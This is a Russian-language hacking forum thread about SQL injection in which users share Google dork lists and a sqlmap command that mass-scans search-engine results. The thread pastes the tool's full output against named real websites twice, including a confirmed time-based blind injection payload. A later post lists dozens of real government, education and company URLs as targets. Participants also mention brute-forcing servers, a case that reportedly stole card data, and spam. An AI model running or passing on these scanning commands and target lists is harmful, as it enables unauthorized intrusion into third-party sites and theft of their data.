SQLi и с чем его едят (2019)

Eject · 24.02.2019

BabaDook сказал(а):

ну кстати да, я чё-та не сразу подумал об кастомном апдейте sqlmap

Ну это не совсем кастом, там хранятся настройки sqlmap в глобальных переменных, значения по умолчанию и всякое такое.
Так что можно спокойно крутить.

BabaDook · 24.02.2019

dokr

Код:

https://www.trickspack.com/fresh-sql-dorks/

https://gbhackers.com/latest-google-sql-dorks/

https://hackingvision.com/2017/04/14/google-dorks-for-sql-injection/

дальше
sqlmap --random-agent --risk=1 --skip-waf --hex --is-dba --batch --time-sec=1 --skip-static --technique=UET --threads=3 --retries=1 -g "inurl:id=1"

У меня отработало

sqlmap --random-agent --risk=1 --skip-waf --hex --is-dba --batch --time-sec=1 --skip-static --technique=UET --threads=3 --retries=1 -g "inurl:id=1"
___
H
_ ['] _ _ {1.1.12#stable}
|_ -| . ['] | .'| . |
|| [.]||_|,| _|
||V || http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:27:28

[01:27:29] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (Windows NT 5.1; U; Firefox/5.0; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53'
[01:27:29] [INFO] using search result page #1
[01:27:35] [INFO] sqlmap got 100 results for your search dork expression, 85 of them are testable targets
[01:27:35] [INFO] sqlmap got a total of 85 targets
URL 1:
GET http://www.dipintoguitars.com/category.php?id=1
do you want to test this URL? [Y/n/q]

Y

[01:27:35] [INFO] testing URL 'http://www.dipintoguitars.com/category.php?id=1'
[01:27:35] [INFO] using '/root/.sqlmap/output/results-02252019_0127am.csv' as the CSV results file in multiple targets mode
[01:27:40] [INFO] testing connection to the target URL
[01:28:02] [CRITICAL] unable to connect to the target URL ('Connection refused'). sqlmap is going to retry the request(s)
[01:28:02] [WARNING] if the problem persists please check that the provided target URL is valid. In case that it is, you can try to rerun with the switch '--random-agent' turned on and/or proxy switches ('--ignore-proxy', '--proxy',...)
[01:28:23] [ERROR] unable to connect to the target URL ('Connection refused'), skipping to the next URL
URL 2:
GET https://en.wikipedia.org/wiki/ID-1
do you want to test this URL? [Y/n/q]

Y

[01:28:23] [INFO] testing URL 'https://en.wikipedia.org/wiki/ID-1'
[01:28:23] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[01:28:23] [INFO] testing connection to the target URL
[01:28:24] [INFO] testing if URI parameter '#1*' is dynamic
[01:28:24] [INFO] confirming that URI parameter '#1*' is dynamic
[01:28:25] [WARNING] URI parameter '#1*' does not appear to be dynamic
[01:28:25] [INFO] skipping static URI parameter '#1*'
[01:28:25] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[01:28:25] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 2 times
URL 3:
GET https://en.wikiyy.com/wiki/ID-1/000
do you want to test this URL? [Y/n/q]

Y

[01:28:25] [INFO] testing URL 'https://en.wikiyy.com/wiki/ID-1/000'
[01:28:25] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[01:28:26] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'https://www.freeunblocked.pw/index.php?q=aHR0cHM6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvSUQtMS8wMDA='. Do you want to follow? [Y/n] Y
[01:28:27] [WARNING] URI parameter '#1*' does not appear to be dynamic
[01:28:27] [INFO] skipping static URI parameter '#1*'
[01:28:27] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 4:
GET http://www.atrium.com.pk/Shopping.php?ID=1
do you want to test this URL? [Y/n/q]

Y

[01:28:27] [INFO] testing URL 'http://www.atrium.com.pk/Shopping.php?ID=1'
[01:28:27] [INFO] testing connection to the target URL
[01:28:28] [INFO] testing if GET parameter 'ID' is dynamic
sqlmap got a 302 redirect to 'http://www.atrium.com.pk:80/404.php'. Do you want to follow? [Y/n] Y
[01:28:29] [INFO] confirming that GET parameter 'ID' is dynamic
[01:28:30] [WARNING] GET parameter 'ID' does not appear to be dynamic
[01:28:30] [INFO] skipping static GET parameter 'ID'
[01:28:30] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 5:
GET http://www.romanianwriters.ro/s.php?id=1
do you want to test this URL? [Y/n/q]

Y

[01:28:30] [INFO] testing URL 'http://www.romanianwriters.ro/s.php?id=1'
[01:28:30] [INFO] testing connection to the target URL
[01:28:31] [INFO] heuristics detected web page charset 'ISO-8859-2'
[01:28:31] [INFO] testing if GET parameter 'id' is dynamic
[01:28:32] [INFO] confirming that GET parameter 'id' is dynamic
[01:28:32] [WARNING] GET parameter 'id' does not appear to be dynamic
[01:28:32] [INFO] skipping static GET parameter 'id'
[01:28:32] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 6:
GET http://www.sansihotels.com/hotels.php?id=1
do you want to test this URL? [Y/n/q]

Y

[01:28:32] [INFO] testing URL 'http://www.sansihotels.com/hotels.php?id=1'
[01:28:32] [INFO] testing connection to the target URL
[01:28:33] [INFO] heuristics detected web page charset 'UTF-8-SIG'
[01:28:33] [INFO] testing if GET parameter 'id' is dynamic
sqlmap got a 302 redirect to 'http://www.sansihotels.com:80/index.php'. Do you want to follow? [Y/n] Y
[01:28:33] [INFO] confirming that GET parameter 'id' is dynamic
[01:28:34] [WARNING] GET parameter 'id' does not appear to be dynamic
[01:28:34] [INFO] skipping static GET parameter 'id'
[01:28:34] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 7:
GET http://esjindex.org/search.php?id=1
do you want to test this URL? [Y/n/q]

Y

[01:28:34] [INFO] testing URL 'http://esjindex.org/search.php?id=1'
[01:28:34] [INFO] resuming back-end DBMS 'mysql'
[01:28:34] [INFO] testing connection to the target URL
[01:28:35] [INFO] heuristics detected web page charset 'UTF-8-SIG'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(1)-- EpUc
---
do you want to exploit this SQL injection? [Y/n] Y
[01:28:35] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[01:28:35] [INFO] testing if current user is DBA
[01:28:35] [INFO] fetching current user
[01:28:35] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[01:28:35] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[01:28:39] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[01:28:40] [INFO] retrieved:
current user is DBA: False
URL 8:
GET https://www.bible-history.com/subcat.php?id=1
do you want to test this URL? [Y/n/q]

Y

[01:28:48] [INFO] testing URL 'https://www.bible-history.com/subcat.php?id=1'
[01:28:49] [INFO] testing connection to the target URL
[01:28:50] [INFO] testing if GET parameter 'id' is dynamic
[01:28:51] [INFO] confirming that GET parameter 'id' is dynamic
[01:28:52] [WARNING] GET parameter 'id' does not appear to be dynamic
[01:28:52] [INFO] skipping static GET parameter 'id'
[01:28:52] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 9:
GET http://www.xrayrisk.com/calculator/calculator-normal-studies.php?id=1
do you want to test this URL? [Y/n/q]

Y

[01:28:52] [INFO] testing URL 'http://www.xrayrisk.com/calculator/calculator-normal-studies.php?id=1'
[01:28:53] [INFO] testing connection to the target URL
[01:28:54] [INFO] testing if GET parameter 'id' is dynamic
[01:28:54] [WARNING] GET parameter 'id' does not appear to be dynamic
[01:28:54] [INFO] skipping static GET parameter 'id'
[01:28:54] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 10:
GET http://www.cacert.org/index.php?id=1
do you want to test this URL? [Y/n/q]

Y

[01:28:54] [INFO] testing URL 'http://www.cacert.org/index.php?id=1'
[01:28:55] [INFO] testing connection to the target URL
[01:28:56] [INFO] testing if GET parameter 'id' is dynamic
[01:28:56] [INFO] confirming that GET parameter 'id' is dynamic
[01:28:56] [WARNING] GET parameter 'id' does not appear to be dynamic
[01:28:56] [INFO] skipping static GET parameter 'id'
[01:28:56] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 11:
GET http://www.asfaa.org/members.php?id=1
do you want to test this URL? [Y/n/q]

Y

[01:28:56] [INFO] testing URL 'http://www.asfaa.org/members.php?id=1'
[01:29:00] [INFO] testing connection to the target URL
[01:29:01] [INFO] testing if GET parameter 'id' is dynamic
[01:29:01] [INFO] confirming that GET parameter 'id' is dynamic
[01:29:02] [WARNING] GET parameter 'id' does not appear to be dynamic
[01:29:02] [INFO] skipping static GET parameter 'id'
[01:29:02] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 12:
GET http://www.bpc.gov.bd/contactus.php?id=1
do you want to test this URL? [Y/n/q]

Y

[01:29:02] [INFO] testing URL 'http://www.bpc.gov.bd/contactus.php?id=1'
[01:29:03] [INFO] testing connection to the target URL
[01:29:04] [CRITICAL] page not found (404)
[01:29:04] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
URL 13:
GET http://www.kvm.co.ke/products.php?id=1
do you want to test this URL? [Y/n/q]

Y

[01:29:04] [INFO] testing URL 'http://www.kvm.co.ke/products.php?id=1'
[01:29:05] [INFO] testing connection to the target URL
[01:29:07] [WARNING] the web server responded with an HTTP error code (404) which could interfere with the results of the tests
[01:29:07] [INFO] testing if GET parameter 'id' is dynamic
[01:29:07] [INFO] confirming that GET parameter 'id' is dynamic
[01:29:08] [INFO] GET parameter 'id' is dynamic
[01:29:09] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[01:29:09] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting attacks
[01:29:09] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[01:29:09] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[01:29:45] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'

Время не пишет, но минут 5 работы
ахах, только надо быть осторожным, а то википедию ненароком поломаем

Eject · 24.02.2019

BabaDook сказал(а):
dokr
Код:
https://www.trickspack.com/fresh-sql-dorks/

https://gbhackers.com/latest-google-sql-dorks/

https://hackingvision.com/2017/04/14/google-dorks-for-sql-injection/
дальше
sqlmap --random-agent --risk=1 --skip-waf --hex --is-dba --batch --time-sec=1 --skip-static --technique=UET --threads=3 --retries=1 -g "inurl:id=1"

У меня отработало

sqlmap --random-agent --risk=1 --skip-waf --hex --is-dba --batch --time-sec=1 --skip-static --technique=UET --threads=3 --retries=1 -g "inurl:id=1"
___
H
_ ['] _ _ {1.1.12#stable}
|_ -| . ['] | .'| . |
|| [.]||_|,| _|
||V || http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:27:28

[01:27:29] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (Windows NT 5.1; U; Firefox/5.0; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53'
[01:27:29] [INFO] using search result page #1
[01:27:35] [INFO] sqlmap got 100 results for your search dork expression, 85 of them are testable targets
[01:27:35] [INFO] sqlmap got a total of 85 targets
URL 1:
GET http://www.dipintoguitars.com/category.php?id=1
do you want to test this URL? [Y/n/q]

[01:27:35] [INFO] testing URL 'http://www.dipintoguitars.com/category.php?id=1'
[01:27:35] [INFO] using '/root/.sqlmap/output/results-02252019_0127am.csv' as the CSV results file in multiple targets mode
[01:27:40] [INFO] testing connection to the target URL
[01:28:02] [CRITICAL] unable to connect to the target URL ('Connection refused'). sqlmap is going to retry the request(s)
[01:28:02] [WARNING] if the problem persists please check that the provided target URL is valid. In case that it is, you can try to rerun with the switch '--random-agent' turned on and/or proxy switches ('--ignore-proxy', '--proxy',...)
[01:28:23] [ERROR] unable to connect to the target URL ('Connection refused'), skipping to the next URL
URL 2:
GET https://en.wikipedia.org/wiki/ID-1
do you want to test this URL? [Y/n/q]

[01:28:23] [INFO] testing URL 'https://en.wikipedia.org/wiki/ID-1'
[01:28:23] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[01:28:23] [INFO] testing connection to the target URL
[01:28:24] [INFO] testing if URI parameter '#1*' is dynamic
[01:28:24] [INFO] confirming that URI parameter '#1*' is dynamic
[01:28:25] [WARNING] URI parameter '#1*' does not appear to be dynamic
[01:28:25] [INFO] skipping static URI parameter '#1*'
[01:28:25] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[01:28:25] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 2 times
URL 3:
GET https://en.wikiyy.com/wiki/ID-1/000
do you want to test this URL? [Y/n/q]

[01:28:25] [INFO] testing URL 'https://en.wikiyy.com/wiki/ID-1/000'
[01:28:25] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[01:28:26] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'https://www.freeunblocked.pw/index.php?q=aHR0cHM6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvSUQtMS8wMDA='. Do you want to follow? [Y/n] Y
[01:28:27] [WARNING] URI parameter '#1*' does not appear to be dynamic
[01:28:27] [INFO] skipping static URI parameter '#1*'
[01:28:27] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 4:
GET http://www.atrium.com.pk/Shopping.php?ID=1
do you want to test this URL? [Y/n/q]

[01:28:27] [INFO] testing URL 'http://www.atrium.com.pk/Shopping.php?ID=1'
[01:28:27] [INFO] testing connection to the target URL
[01:28:28] [INFO] testing if GET parameter 'ID' is dynamic
sqlmap got a 302 redirect to 'http://www.atrium.com.pk:80/404.php'. Do you want to follow? [Y/n] Y
[01:28:29] [INFO] confirming that GET parameter 'ID' is dynamic
[01:28:30] [WARNING] GET parameter 'ID' does not appear to be dynamic
[01:28:30] [INFO] skipping static GET parameter 'ID'
[01:28:30] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 5:
GET http://www.romanianwriters.ro/s.php?id=1
do you want to test this URL? [Y/n/q]

[01:28:30] [INFO] testing URL 'http://www.romanianwriters.ro/s.php?id=1'
[01:28:30] [INFO] testing connection to the target URL
[01:28:31] [INFO] heuristics detected web page charset 'ISO-8859-2'
[01:28:31] [INFO] testing if GET parameter 'id' is dynamic
[01:28:32] [INFO] confirming that GET parameter 'id' is dynamic
[01:28:32] [WARNING] GET parameter 'id' does not appear to be dynamic
[01:28:32] [INFO] skipping static GET parameter 'id'
[01:28:32] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 6:
GET http://www.sansihotels.com/hotels.php?id=1
do you want to test this URL? [Y/n/q]

[01:28:32] [INFO] testing URL 'http://www.sansihotels.com/hotels.php?id=1'
[01:28:32] [INFO] testing connection to the target URL
[01:28:33] [INFO] heuristics detected web page charset 'UTF-8-SIG'
[01:28:33] [INFO] testing if GET parameter 'id' is dynamic
sqlmap got a 302 redirect to 'http://www.sansihotels.com:80/index.php'. Do you want to follow? [Y/n] Y
[01:28:33] [INFO] confirming that GET parameter 'id' is dynamic
[01:28:34] [WARNING] GET parameter 'id' does not appear to be dynamic
[01:28:34] [INFO] skipping static GET parameter 'id'
[01:28:34] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 7:
GET http://esjindex.org/search.php?id=1
do you want to test this URL? [Y/n/q]

[01:28:34] [INFO] testing URL 'http://esjindex.org/search.php?id=1'
[01:28:34] [INFO] resuming back-end DBMS 'mysql'
[01:28:34] [INFO] testing connection to the target URL
[01:28:35] [INFO] heuristics detected web page charset 'UTF-8-SIG'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(1)-- EpUc
---
do you want to exploit this SQL injection? [Y/n] Y
[01:28:35] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[01:28:35] [INFO] testing if current user is DBA
[01:28:35] [INFO] fetching current user
[01:28:35] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[01:28:35] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[01:28:39] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[01:28:40] [INFO] retrieved:
current user is DBA: False
URL 8:
GET https://www.bible-history.com/subcat.php?id=1
do you want to test this URL? [Y/n/q]

[01:28:48] [INFO] testing URL 'https://www.bible-history.com/subcat.php?id=1'
[01:28:49] [INFO] testing connection to the target URL
[01:28:50] [INFO] testing if GET parameter 'id' is dynamic
[01:28:51] [INFO] confirming that GET parameter 'id' is dynamic
[01:28:52] [WARNING] GET parameter 'id' does not appear to be dynamic
[01:28:52] [INFO] skipping static GET parameter 'id'
[01:28:52] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 9:
GET http://www.xrayrisk.com/calculator/calculator-normal-studies.php?id=1
do you want to test this URL? [Y/n/q]

[01:28:52] [INFO] testing URL 'http://www.xrayrisk.com/calculator/calculator-normal-studies.php?id=1'
[01:28:53] [INFO] testing connection to the target URL
[01:28:54] [INFO] testing if GET parameter 'id' is dynamic
[01:28:54] [WARNING] GET parameter 'id' does not appear to be dynamic
[01:28:54] [INFO] skipping static GET parameter 'id'
[01:28:54] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 10:
GET http://www.cacert.org/index.php?id=1
do you want to test this URL? [Y/n/q]

[01:28:54] [INFO] testing URL 'http://www.cacert.org/index.php?id=1'
[01:28:55] [INFO] testing connection to the target URL
[01:28:56] [INFO] testing if GET parameter 'id' is dynamic
[01:28:56] [INFO] confirming that GET parameter 'id' is dynamic
[01:28:56] [WARNING] GET parameter 'id' does not appear to be dynamic
[01:28:56] [INFO] skipping static GET parameter 'id'
[01:28:56] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 11:
GET http://www.asfaa.org/members.php?id=1
do you want to test this URL? [Y/n/q]

[01:28:56] [INFO] testing URL 'http://www.asfaa.org/members.php?id=1'
[01:29:00] [INFO] testing connection to the target URL
[01:29:01] [INFO] testing if GET parameter 'id' is dynamic
[01:29:01] [INFO] confirming that GET parameter 'id' is dynamic
[01:29:02] [WARNING] GET parameter 'id' does not appear to be dynamic
[01:29:02] [INFO] skipping static GET parameter 'id'
[01:29:02] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 12:
GET http://www.bpc.gov.bd/contactus.php?id=1
do you want to test this URL? [Y/n/q]

[01:29:02] [INFO] testing URL 'http://www.bpc.gov.bd/contactus.php?id=1'
[01:29:03] [INFO] testing connection to the target URL
[01:29:04] [CRITICAL] page not found (404)
[01:29:04] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
URL 13:
GET http://www.kvm.co.ke/products.php?id=1
do you want to test this URL? [Y/n/q]

[01:29:04] [INFO] testing URL 'http://www.kvm.co.ke/products.php?id=1'
[01:29:05] [INFO] testing connection to the target URL
[01:29:07] [WARNING] the web server responded with an HTTP error code (404) which could interfere with the results of the tests
[01:29:07] [INFO] testing if GET parameter 'id' is dynamic
[01:29:07] [INFO] confirming that GET parameter 'id' is dynamic
[01:29:08] [INFO] GET parameter 'id' is dynamic
[01:29:09] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[01:29:09] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting attacks
[01:29:09] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[01:29:09] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[01:29:45] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'

Время не пишет, но минут 5 работы
ахах, только надо быть осторожным, а то википедию ненароком поломаем

Я там во втором посте упоминал AutoSqli, так вот это смесь sqlmap, googler(для поиска через гугл), ddgr(для поиска через duckduckgo) и WhatWaf? (для автоопределения WAF)
Как этот монстр работает я не в курсе, ссылочка: https://github.com/jesuiscamille/AutoSQLi
Если кто-то затестит, расскажите в статейке как оно.

BabaDook · 24.02.2019

Eject сказал(а):

Я там во втором посте упоминал AutoSqli, так вот это смесь sqlmap, googler(для поиска через гугл), ddgr(для поиска через duckduckgo) и WhatWaf? (для автоопределения WAF)
Как этот монстр работает я не в курсе, ссылочка: https://github.com/jesuiscamille/AutoSQLi
Если кто-то затестит, расскажите в статейке как оно.

оке, через неделю обзор запилю. Если помогут сылками

Xrenovi4 · 25.02.2019

BabaDook сказал(а):

оке, через неделю обзор запилю. Если помогут сылками

Пиши сколь линков надо, я тебе спаршу

BabaDook · 25.02.2019

Xrenovi4 сказал(а):

Пиши сколь линков надо, я тебе спаршу

Окей, ближе к делу напишу

lossir · 25.02.2019

BabaDook сказал(а):

чем тебе с дедиками не тема?

Брут то? А ты попробуй сбруть хоть один сейчас...

Eject сказал(а):

На экспе был более свежий кейс, там суть была в поиске возможной sql инъекции Netsparker'ом и докручивание скули и дамп sqlmap'ом.
Если без кодинга в полне норм вариант, всё это крутилось на сервачках, автор писал даже что CC доставал.

А скинь линк на кейс, интересно.

lossir · 25.02.2019

дел

BabaDook · 25.02.2019

lossir сказал(а):

Брут то? А ты попробуй сбруть хоть один сейчас...

А скинь линк на кейс, интересно.

Ты только этот метод знаешь? В чем проблемы брутануть?

m_m_m · 25.02.2019

хорошая статья, спасибо. Про спам интересно будет

BabaDook · 02.03.2019

Eject сказал(а):

Я там во втором посте упоминал AutoSqli, так вот это смесь sqlmap, googler(для поиска через гугл), ddgr(для поиска через duckduckgo) и WhatWaf? (для автоопределения WAF)
Как этот монстр работает я не в курсе, ссылочка: https://github.com/jesuiscamille/AutoSQLi
Если кто-то затестит, расскажите в статейке как оно.

Вообщем, у меня этот авто скрипт выдаёт ошибки различные, скорее всего не будет статьи. Всем сарян.

https://github.com/Ekultek/WhatWaf Для любителей автоматизации

Не парни, сарян, херня всё это... Руками быстрее и вектора лучше.

Eject · 02.03.2019

BabaDook сказал(а):

Вообщем, у меня этот авто скрипт выдаёт ошибки различные, скорее всего не будет статьи. Всем сарян.

https://github.com/Ekultek/WhatWaf Для любителей автоматизации

Не парни, сарян, херня всё это... Руками быстрее и вектора лучше.

Руки и/или бурп всегда быстрее

D@rkS1de · 03.03.2019

Eject сказал(а):

Я там во втором посте упоминал AutoSqli, так вот это смесь sqlmap, googler(для поиска через гугл), ddgr(для поиска через duckduckgo) и WhatWaf? (для автоопределения WAF)
Как этот монстр работает я не в курсе, ссылочка: https://github.com/jesuiscamille/AutoSQLi
Если кто-то затестит, расскажите в статейке как оно.

берешь ставишь и юзаешь , а не ждешь что-то кто-то за тебя сделает и напишет то нажми там напиши

BabaDook · 03.03.2019

D@rkS1de сказал(а):

берешь ставишь и юзаешь , а не ждешь что-то кто-то за тебя сделает и напишет то нажми там напиши

Оно не очень работает. Это просто обвязка из инструментов, можно узнать как работает каждый из, что и как делает, что берёт на вход. Вообщем я немного глянул, ничего сложного, ничего интересного

zagon · 03.03.2019

BabaDook сказал(а):

Можно как-то так сделать

url.txt

Код:

http://www.ventrilo.com/dlprod.php?id=1
https://zoom.us/postattendee?id=1
http://my.earthlink.net/start/?id=1
https://home.careerstep.com/?id=1
https://library.cps.edu/index.php?loc_id=1
http://www.ctlottery.org/Modules/Games/default.aspx?id=1
https://cararuns.org/cs/cara/page.detail?page_id=1
https://fortress.wa.gov/ecy/enviwa/StationInfo.aspx?ST_ID=1
https://www.dsc.com/?n=library&o=view_documents&id=1
http://stats.statbroadcast.com/statmonitr/?id=1
https://account.lunarpages.com/login.php?s_id=1
http://www.legalassist.org/?id=1
http://media.krone-northamerica.com/index.php?id=1&L=1
https://www.egscomics.com/index.php?id=1
https://www.xmlvalidation.com/?id=1&L=0
https://wall.alphacoders.com/by_category.php?id=3
http://killerbunnies.com/?page_id=3
https://www.cruisecritic.com/articles.cfm?ID=3
https://www.roberts.edu/clc?id=3
https://www.eeoc.gov/?page_id=3
https://ca.countingopinions.com/index.php?page_id=3
https://amhistory.si.edu/militaryhistory/printable/section.asp?id=3
http://pima.granicus.com/ViewPublisher.php?view_id=3
https://www.usmle.org/contact/?id=3
http://www.airmar.com/productdescription.html?id=3
https://kb.wisc.edu/page.php?id=3
http://ncdp.crlctraining.org/catalog/?id=3
https://www.arconic.com/global/en/products/browse.asp?bus_id=3
http://sourkrautsmodeltrucks.com/?page_id=3
http://calleam.com/WTPF/?page_id=3
https://friendsofscience.org/index.php?id=3
http://cit.memphis.edu/curriculuma.php?id=3&page=2
https://support.wdc.com/cat_products.aspx?ID=3&lang=en&i

Если надо тестануть сайты на наличие , то
